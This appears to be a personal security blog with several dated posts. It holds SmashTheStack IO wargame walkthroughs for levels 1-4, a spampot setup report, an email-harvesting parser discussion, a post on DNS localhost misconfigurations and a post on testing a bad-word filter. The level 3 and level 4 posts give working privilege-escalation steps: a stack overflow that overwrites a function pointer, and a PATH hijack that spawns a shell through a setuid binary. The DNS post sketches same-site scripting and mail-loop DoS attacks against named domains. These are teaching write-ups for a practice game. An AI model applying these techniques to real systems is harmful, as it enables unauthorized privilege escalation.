2010
05.03

Welcome to level 4. In my opinion, this is easier than the previous levels if you have knowledge on how exectuables are being looked for in OS. You have been given both executable and source code again. When we first run the program, the following result is shown.

level4@io:/levels$ ./level4
uid=1004(level4) gid=1004(level4) euid=1005(level5) groups=1004(level4),1029(nosu)

Looks like it is running the command id.

The id command lists the real and effective user IDs and the group IDs of the user associated with the current process. This is the counterpart to the $UID, $EUID, and $GROUPS internal Bash variables. The id command shows the effective IDs only when they differ from the real ones. – From webtools.live2support.com

You can confirm it by looking at its source code. And yes, it does have a statement

system(“id”);

which call the Linux command.

If you are familiar with this command enough, actually it is just a piece of executable which is usually located at /bin/. But why you can run the command by just typing “id“, not “/bin/id“? It is because we have environment variable in our OS. In *nix system, it is PATH, you can use echo $PATH to see what is the current value of it.

level4@io:/levels$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/games

So what we are going to do at this level are:

  1. Create a piece of code or script that call “/bin/sh
  2. Redirect the “id” command to run your script
  3. Execute level4 executable

Why this works because the level4 executable has euid = level5, see definition of euid. If we bring up a shell from this executable, the shell will have level5 permission automatically. Amazing enough?

Actually you can only create code or scripts under /tmp/. We can do the following to create a script their.

level4@io:/levels$ mkdir /tmp/onhacks/
level4@io:/levels$ echo “/bin/sh” > /tmp/onhacks/id
level4@io:/levels$ chmod +x /tmp/onhacks/id

Next step is to change the environment variable by running:

level4@io:/levels$ PATH=/tmp/onhacks:/usr/bin:/bin:/usr/games

Now, you are ready to grant the access next level. Remember to grab the password for level 5. It reminds us to utilitze what you learn, even a little trick can break a big hole. Think creatively and diversely.

See you in level 5.

Note:

  1. Other option: You can replace the script with a piece of C code which execute execl(“/bin/sh”);
  2. Your changes on environment variable will not affect others, it is scoped in the current session.
2010
04.28

Hi all the heroes, you are now level 3 and it is time to fight with a little boss. This is time, the monster that blocking your way requires you to write some code (or script) to finish it. Different from previous two level, this time you can have the executable and source code. As usual, first we execute the program without parameter:

level3@io:~$ /levels/level03
Segmentation fault

Crap! I hate seeing segmentation fault, how about giving it a parameter?

level3@io:~$ /levels/level03 nosegmentationfault
Address of hmm: 0x804847f

The executable gives us a hint that hmm is the key at this level. Let’s attach gdb and see what is inside the program.

(gdb) disass hmm
Dump of assembler code for function hmm:

0x080484a8 <hmm+41>:    call   0×8048340 <execl@plt>

I guess we are looking at the right place, hmm is a function which execl “something”. By looking at the source code, we can confirm that the function is what we need. The remaining part to grant access is to use stack buffer overflow. How can we achieve it? Go back to the source code, there is an interesting thing.

int (*fptr)(int) = good;

(*fptr)((int)hmmptr);

The program is using an unusual way to execute function good, we can take advantage of it to call hmm() by rewriting the value in *fptr. Can we do this? We need to look at how the stack buffer looks like.

As you can see, the variable that is being declared later will have a smaller address. In other words, we can overwrite the values in *fptr by specifying more than 32 bytes to buf. Let’s go back to gdb and see when *fptr is being used to call.

(gdb) disass main

0x0804859f <main+240>:  mov    eax,DWORD PTR [ebp-0x14]
0x080485a2 <main+243>:  call   eax

The function is being called at 0x080485a2. Then how is the buffer looks like at that time?

(gdb) break *0x080485a2
Breakpoint 1 at 0x80485a2
(gdb) run $(perl -e ‘print “B”x40′;)
(gdb) x/20x $esp
0xbfffdcc0:     0x0804847f      0×00000000      0×00000030      0×00000000
0xbfffdcd0:     0×00000000      0×00000000      0xbfffde8d      0x0804847f
0xbfffdce0:     0×41414141      0×41414141      0×41414141      0×41414141
0xbfffdcf0:     0×41414141      0×41414141      0×41414141      0×41414141
0xbfffdd00:     0×41414141      0×42424242      0×00000000      0×00000029

According to the graph above, *fptr is located at 0xbffdd00. From the memory dump above, the first half of the variable is being replaced by 4 “A”. But actually the last 4 bytes in *fptr is already good enough because address are 4 bytes long in 32-bit machines. So what you need is constructing a string with 40 characters long, which fits into variable buf, the last 4 bytes are storing the address of hmm(). Keep in mind that the address is being stored differently in memory (It is Big-Endian).

You can create the parameter like this:

./level3 `perl -e ‘print “B”x36′; printf <Address of hmm() in Big-Endian representation>`

Ready to go to level 4? See you then.

2010
04.26

How do you feel about breaking the program in level 1? Do you think that you can be a hacker? Sure you can. What you need is getting familiar with tools (weapons) that you have, and always be evil. gdb is always one of the great tool for investigation. But we usually don’t use it to discover vulnerabilities in a software because usually software has thousands or millions line of code which makes it not very possible that you can find a hole with your eye, no matter you are shortsighted or not. :P

Anyway, let’s move one to the next stage. After finishing the little thing at level1, we have a bigger thing waiting at level2 (not even a boss yet). When you first execute the program with no parameters, you will have this:

Append the 39th through 42nd numbers in the sequence as a string and feed it to this binary via argv[1]. 1, 2, 3, 5, 8, 13, 21…
The 4th through the 7th numbers would give you 581321

Easy enough? This time, you don’t really need to break the program, you just need to find what it wants and pass it as a string. Obviously, this is a Fibonacci Sequence and in this case, the 45th number (1836311903) is still fit within 231-1. So, you can just write a simple program to generate the sequence then print the 39th through 42nd numbers. Or if you don’t want to write a program, any spreadsheet software should be able to help you calculate the sequence.

Not much I can tell you this time. What you can learn here is, try tackle a problem in different ways, and get familiar with what you have. See you in level 3!

2010
04.21

Let’s begin our wargame from SmashTheStack IO level 1. In my opinion, this game is a good practice to get familiar with gdb, the widely used debugger in *nix system. Okay, so first of all, you need a way to ssh to the domain io.smashthestack.org at port 2224 with this credential: level1@level1. This is the entrance point as stated in this page: http://io.smashthestack.org:84/

The level 1 program should be located at /levels/level01. When you first execute this program w/o any parameters, it will provide you its help:

Usage: ./level01 <password>

If you type something like ./level01 password, result could be: Fail.

Let’s attach the gdb and see what is interesting in its main program.

level1@io:/levels$ gdb ./level01
(gdb) disass main

0x0804846c <main+120>:  call   0x804830c <strncmp@plt>
0×08048471 <main+125>:  test   %eax,%eax
0×08048473 <main+127>:  jne    0x804849f <main+171>

0×08048498 <main+164>:  call   0x80482ec <execl@plt>

0x080484be <main+202>:  ret

You will soon discover this line

0x0804846c <main+120>:  call   0x804830c <strncmp@plt>

is where we are interested in. Few lines from this statement, there is a execl call, it seems that the strncmp is being used in an if statement. So we can set a break point at 0x0804846c and see what are they comparing.

(gdb) break *0x0804846c
(gdb) run password
(gdb) i r
eax            0x80485c8        134514120
ecx            0xbfffdebd       -1073750339

If you try to get value at the address stored in each register, you will get the password which leads you to next level, because one of the register is pointing to the expected string that will execute the execl statement, and another one is your input. What you need to do is to run level1 program again with the right input, then you will have access to level2 and you can retrieve the password to login as level2 by looking at /home/level2/.pass.

I am not going to tell you the actual input for level1, you are just a step away from the goal after reading my logs above. Assuming you are new to gdb, what you can learn here are:

  1. How to attach a debugger (gdb) to a program?
    Ans. gdb <executable path> or gdb -q <executable path>
  2. How to disassemble a function in an executable?
    Ans. disass <function name>
  3. How to set break point in an executable?
    Ans. break <instruction address>
  4. How to run a program in gdb with parameter?
    Ans. run [<parameter>]
  5. How to dump the current values of registers?
    Ans. info registers (“i r” in short)
  6. How to look at the value of an address stored in a register?
    Ans. You need to figure this out. :)

I am moving on to next level, how about you?

Hope you enjoy playing this IO wargame.

2010
04.19

After disappearing for quite a long time, I am trying to continue writing something which can also prove that I am still alive. Few updates around me.

  1. I just moved from Richmond, BC to Redmond, WA. Working with my team more closely.
  2. Helping my team to start up a new project for customers who want to rebrand our product as a service.
  3. Started playing wargames (in security).

Yes! I am playing security wargame in SmashTheStack. The main goal is to use the program you can run in the current level to gain access to the advance level, there is always a vulnerability in the programs. It has many different types of games, depending on what vulnerability the programs have, or how you are going to break them. eg. IO, Logic, Blackbox.

I just started playing with the IO games, while all the programs I broke so far is depending on the input you gave. Usually, they have stack buffer overflow or heap buffer overflow issues.

Why I am presenting this post with subject “SmashTheStack series”? Because I would like to present the solutions (or hints) of the levels that I already solved. In the next few months, I will focus on breaking the programs there. Until I have any bright idea on a security topic that I would like to work on or share. BTW, this game is good for you to play with during leisure time.

2009
12.08

This is a report more than discovery in spam collection. I was working on setting up a spampot using spampot.py which was written by Neale Pikett back to 2003. Although the result is not as my expectation, it does gives me more information about setting up a spampot.

Goal

The goal of running a spampot (honeypot which only care about spam) is to collect spam and analysis the trend of them, hopefully we can find some interesting techniques that spammers/ hackers use in junk and phishing emails.

Approach
So far, there are at least two types of spampot hosting method that I know. The names of them are designed by me, if there are formal names for them, please let me know.

Open Relay Spampot: This kind of honeypot is running as an open mail relay server. In case you are not familiar with, open relay means users can send message through the server anonymously.

Close Relay Spampot: The spampot is running as a close mail relay server. To expose the server to spammers, you need to have your own domain binding to this server with email address(es) exposing to spammers/ hackers. For example, we can have onhacks.org binding to a spampot and spam@onhacks.org is one of the email address we want to expose to spammers. However, about the methods to increase the exposure of an email addresses is out of scope, we can discuss more on it later.

In my setup, I decided to run spampot as open mail relay server.

Setup
I have VirtualBox installed on top of Windows 7. I am using Ubuntu as the guest OS, this is because it seems the implementation was done in *nix system. Since port 25 is the default port for SMTP service, we need to forward packets from host (Win7) to guest (Ubuntu) so that the spampot in guest OS can react to incoming connection at host port 25.

(Assuming that you are using NAT for VirtualBox)
To enable port forwarding, you need to set the HostPort 25 forwarding to GuestPort 25. For more detail around port forwarding in VirtualBox, please refer to this article.

However, you will soon discover that it is not possible to perform port forwarding if the port is reserved (< 1024). This can easily be resolved by running VirtualBox with admin credential (ie. Run As Administrator).

The spampot.py requires Sendmail being installed in Linux. Since sendmail actually is a service listening to port 25, I will do the follow to switch to spampot.py:

sudo /etc/init.d/sendmail stop
sudo spampot.py 0.0.0.0

Surely you can set this automatically run when the system is started.

The last thing is to add a DNS record pointing to my machine. I have smtp.onhacks.org. pointing to it. Since it is still under experiment, the machine is running at home and IP is dynamic, I need to change it often.

Result
Currently, I got 0 message after running the spampot for few days. I have google around and looks like open relay spampot is not that popular anymore because many server admins aware that spammers were abusing open mail relay servers, they don’t allow open relay anymore. As a result, submitting spams to open relay servers is not efficient anymore.

I will continue running the spampot these days and see if we can get more spam through open relay honeypot. Afterward, I will work on close relay spampot.

Reference

  1. Open mail relay – Wikipedia
  2. spampot.py – written by Neale Pickett
  3. Configure Port Forwarding to a VirtualBox Guest OS – Tombuntu
  4. SpamPots Project – Cert.org
  5. Brazilian Honeypots Alliance
2009
11.29

Last night, I was waken by a call that a server was not working. This server is hosting an online judging system (similar to uva.onlinejudge.org, which has algorithmic problems that users can solve). I took a quick look at the compilation process and web pages, everything looked good except it always return “Compilation Error” no matter what was the content in source code (even a HelloWorld!). By manually compiled the source code, the compilation error message gave more detail information about the root cause…Not enough space to link the object files! When I did a “df”, it said that the data partition was used 100%!!

After a deeper investigation, I discovered that one of the user was preparing questions on the machine, and generated a 12GB test data unexpectedly. Since this is a very old machine, it only has a 14GB hard disk for data storage and it already had 2GB data on it. This is kind of DoS attack since no one can submit sources to the judging system even though they can navigate to it.

Lesson learned: We should have restriction on storage usage of each user instead of unlimited.

Any other suggestion to prevent this happen again?

2009
09.12

I disappeared again after my last post talking about spam collections and DNS misconfigurations. Today, I read log0′s post which he is calling for bots/ tools for his security research. Did you see anything familiar to you? How log0 is showing his contact to us, “log0 [ at ] gmail [ dot ] com”. We were using this format for quite some time, after we realized that showing full form of our address (eg. spam@onhacks.org) increases the chance that our email get exposed to spammers.

However, these kinds of representation already appeared on the Internet for last few years. Did you ever think of one fact is that: A clever spammers just need to modify few lines of code in their bots, changing the target strings they are looking for, then everything is just working as the same as in the past.

The most interesting thing is that RSnake has blogged his finding on this form of email representation last Tuesday. In short, he has googled with “at gmail dot com”, and surprisingly there are at least 6 email addresses in the first result page. There are many variations, but they all have the same pattern, here are some examples:

spam  at  onhacks  dot  com
spam [at] onhacks [dot] com
spam (at) onhacks (dot) com
spam <at> onhacks <dot> com
spam “at” onhacks “dot” com

(Obviously, I am trying my best to let spammers know my address)

I spent an hour to write a very simple PoC parser to retrieve email addresses from the result page mentioned above. Obviously there are at least 4 valid email addresses, it is not too hard to get those email addresses by bots. The parser is just looking for 1 ‘at’ and 1 ‘dot’ keyword appears sequentially in the pattern: [any word] “at” [any word] “dot” [any word]. The code is poorly written, I will improve it later this week.

It is not so difficult to discover the pattern between these email addresses, just a piece of cake even for primary students. Then, what kind of representation we should use to show our email address on the Internet? Display the jpeg of the email? Without adding noises to the image, it is as easy as just performing text recognition. With noises on the image, it is more like CAPTCHA. Since most of the CAPTCHA solver aims on specific type of CAPTCHA, it may takes more time to decrypt an “encrypted” email using CAPTCHA. However, it is not unsolvable.

What is the takeaway then? Better not showing your address on web! Or encrypt it into CAPTCHA, at least your email address has less chance being captured by spammers.

2009
08.08

It is a long time after my last post. I was disappearing because the project I am working on is going to be shipped soon, busying with finding bugs and fixing test cases these few months.

Anyway, let’s get back to a security discussion today. I was playing around with testing DNS resolver feature in my product, DNS is always a great place to play with. When I was looking for any interesting scenarios that can test the feature, I found this article. Although it is an old news, the problem is still in the wild.

DNS Misconfiguration

Many administrators like to install “localhost. IN A 127.0.0.1″ as a record in their DNS server. However, administrators always mistakenly drop the trailing dot (ie. “localhost IN A 127.0.0.1″). Since they put this record into a DNS zone (eg. yahoo.com), the record actually becomes “localhost.yahoo.com. IN A 127.0.0.1″! In other words, when you nslookup “localhost.yahoo.com”, it gives you 127.0.0.1!

I found that there are still many such misconfiguration in the wild. Here are some example:

localhost.fbi.gov gives IP address 127.0.0.1
localhost.domain.ca gives IP address 127.0.0.1
localhost.gov.za gives IP address 127.0.0.1
localhost.cancer.gov gives IP address 127.0.0.1

Application

Same-Site Scripting attack

It is trivial that hackers can take advantage of these mis-configured DNS records on multi-user system. Consider there are two users log0 and .hac in a *nux system, .hac can write a piece of program bind on a port (eg. 1024) of the system. Afterward, .hac sends an email to log0, pretends showing some interesting stuffs from fbi.gov, for example, an image with unknown symbols (ie. an <img> tag in the mail, <img src=”http://localhost.fbi.gov:1024/symbols.jpeg” />). Imagine what will happen when log0 is going to read the message? Yes! The browser will resolve localhost.fbi.gov which is pointing to 127.0.0.1, and connect to 127.0.0.1:1024 to grab the image. Wow, your program should be able to grab credentials of log0 by looking at the HTTP request. This is called same-site scripting attack, already mentioned in the article.

Possible (D)DoS attack

Same-site scripting attack is against a client, there is another possible one against the server. Consider a mail system (eg. gmail.com), it accepts message submitted by their users to anyone in the wild. However, the system never know whom it should connect to and get the message delivered until it resolve the address of the domain. What will happen if we submit a message with recipient none@localhost.gov.za (localhost.gov.za is pointing to 127.0.0.1)? The mail flow is like the following:

  1. Message submitted: MAIL FROM: evil@gmail.com, RCPT TO: non@localhost.gov.za
  2. Gmail receive and resolve address of localhost.gov.za (localhost.gov.za. IN A 127.0.0.1 as response)
  3. Depends on the implementation, it may go back to
    Step 1, which mean the message is resubmitted to the same server;
    Step 2, the server rejects the message, marks it as failed to submit and going to retry;
    Otherwise, detected loopback address and drop the message due to security concern.

The security concern is actually DoS attack, if the system allows to go back to step 1 or 2, the message actually gets stuck in the mail system. Hackers can submit thousands or millions of this message to increase the work load of the mail system, and finally it is DoS. I mentioned that it may be DDoS because the mail system may have mechanism to limit total number of submission per user per hour, hacker needs to have multiple mailboxes to achieve the goal.

I have tested some famous email system, Gmail, Hotmail and Exchange 2010. Here are some brief observation:

Gmail: Accepts the first submission of message with recipient has loopback address. However, it refuses to accept a message from the same origin, which means resubmitting the message is not allowed. The system marks the message as failed and attempt to retry it within 3 days.

Hotmail: Similar with Gmail, but it only retry in 2 days.

Exchange 2010: If it is a loopback address, the server will drop it and give NDR with security concern as a reason.

It is obvious that this kind of misconfiguration in DNS server can cause many attacks to both client and server, I believe that there should be more interesting usage of DNS records pointing to 127.0.0.1. Let me know if you have any interesting scenarios.

Remember: localhost. IN A 127.0.0.1 (If you are not doing evil thing. ;) )

Reference:

2009
05.31

Testing something is always a good practice before learning how to hack something, the methodologies we use in testing sometimes are applicable in hacking. So, I am planning to write some entries related to testing in the coming few months. See if we can have discover a systematic way to hack. Here is the first challenge, it is very simple.

Problem
Network managers always want to or are forced to control the information flowing around a network. Most of the time, filtering is a good way to do the control. Inside this big category, we always like to use block list to prevent information comes in or goes out, to and from the network.

Scenarios
Flora doesn’t want her daughter wallow in Japan pop star. Flora knows that her daughter always navigate to some sites with domain name ending as ‘.jp’, she is looking for a tool that can control what kinds of websites their PC can reach.

IT administrator in PC middle school discovered that their mail system started receiving porn advertisement and students are trying to share these links through the mail system, they are planning to have a filter that can block all such mail flows.

Justin loves blogging so much, he is writing them weekly. He loves to collect and read feedbacks from the audiences. However, he hates those spammer pasting unrelated advertisement on his posts. He want to figure out a way to stop them appearing from other audiences.

Solution
The trivial filtering solution to help these people out is bad word filtering. The basic idea is the same as general block list, users can specify the tokens they want to look for when deciding to block the information. In general, there are at least two different definitions to distinguish whether we found the bad word or not. Given an input message M,

  1. Split the message M into a sequence of words Ws, we found a bad word bW is in the message only if Ws contains bW.
  2. Take the message M as an input stream, we found a bad word bW when there is a list of consecutive characters equals bW.

Both definition has there own advantages and disadvantages, but we will keep this discussion later since the current topic is how to test the filter. Let’s say we pick the first definition for our filter, then what should we test? (Take some time to think about scenarios before continue reading)

Functional Test
According the input of this filter (input message M), we can design few functional test cases. Basic scenarios are,

  • empty message [Expected: Accept];
  • only a word (either good or bad word) [Expected: good - Accept, bad - Reject];
  • two words (good and bad) with different delimiter [Expected: Depends on how the feature define delimiter];
  • a list of word and contains (0, 1, 2, all) bad words [Expected: all reject];
  • a bad word is embedded in a word (eg. assume evil is bad word, message conatins residentevil.com) [Expect: By design, this message will be accepted]

Beside these functional test cases, we should to have a lengthy message to check boundary cases of the feature. Assume the longest message we accept is N characters, we need to have message with length N, N+1 and N+2. On the other hand, globalization and localization test may be required, depends on who is your target user.

Security Concern
Then we would ask: is there other way to bypass the filter (eg. message using different encoding)? Is it possible to have code injection or script injection attack? Who can use the feature? Where is the bad word list? Who have rights to touch the list? These are security concerns when testing the feature. Drawing a data flow diagram always help to identify what kind of security issues we may have. However, this post only focus on functional testing a feature. May be next time we can discuss how to design security test cases of a feature.

Conclusion
We have only discussed some elementary skills to design the test plan of a feature. You can consider what kind of input the feature can have, both valid and invalid input. Output is another way to discover new scenarios, output is anything that the feature shown. Since we assumed that this filter only say accept or reject of a message and throw some exceptions (eg. input size exceed), the test cases we found here are almost dominated by what we found with the input. Now, you are able to test your program more systematically!

Have a good weekend!

Practice (Just for fun)
Should you want to have some practice, we can discuss how to test an IP block list filter. Here is a simple definition:

INPUT: Only allow IPv4 address, one at a time
IMPLEMENTATION: An IP block list is stored as a text file in the same folder of the filter, user need to directly modify the text file if he want to Add/Remove/Edit an IP address in the block list. The filter will perform a binary search to see if the input address is on the list. If it is, then it will announce reject, otherwise output accept.
OUTPUT: Accept/ Reject the address